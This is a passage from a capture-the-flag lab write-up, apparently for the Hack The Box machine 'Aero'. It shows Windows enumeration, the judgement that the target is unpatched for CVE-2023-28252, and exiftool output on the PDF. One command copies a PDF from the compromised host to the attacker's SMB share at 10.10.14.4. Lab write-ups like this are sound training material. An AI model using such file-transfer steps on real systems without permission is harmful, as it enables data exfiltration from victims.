PDF Document
ps c:\Users\sam.emerson\Documents> ls
directory: C:\Users\sam.emerson\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/21/2023 9:18 AM 14158 CVE-2023-28252_Summary.pdf
-a---- 9/26/2023 1:06 PM 1113 watchdog.ps1Upon completing basic enumeration, I have come across a PDF file located in the home directory of the sam.emerson user
ps c:\Users\sam.emerson\Documents> copy .\CVE-2023-28252_Summary.pdf \\10.10.14.4\test\I will transfer the PDF file to the Windows host over the existing SMB
CVE-2023-28252_Summary.pdf
The PDF file goes over a local privilege escalation vulnerability, CVE-2023-28252, that targets the Windows Common Log File System (CLFS) Driver
Given the PDF file was in the target system, the target system might be vulnerable to it
Checking the MSRC regarding the vulnerability reveals the updates and it’s NOT included in those 7 hotfixes.
This makes the target system vulnerable to it
Moving on to [[Aero_Privilege_Escalation#[CVE-2023-28252](https //nvd.nist.gov/vuln/detail/CVE-2023-28252)|Privilege Escalation]] phase
Metadata
┌──(kali㉿kali)-[~/archive/htb/labs/aero]
└─$ exiftool CVE-2023-28252_Summary.pdf
exiftool version number : 12.67
file name : CVE-2023-28252_Summary.pdf
directory : .
file size : 14 kB
file modification date/time : 2023:09:21 23:58:09+02:00
file access date/time : 2024:01:16 13:25:27+01:00
file inode change date/time : 2024:01:16 13:25:42+01:00
file permissions : -rwxr-xr-x
file type : PDF
file type extension : pdf
mime type : application/pdf
pdf version : 1.6
linearized : No
page count : 1
language : en-US
creator : Writer
producer : LibreOffice 7.4
create date : 2023:09:21 18:18:14+02:00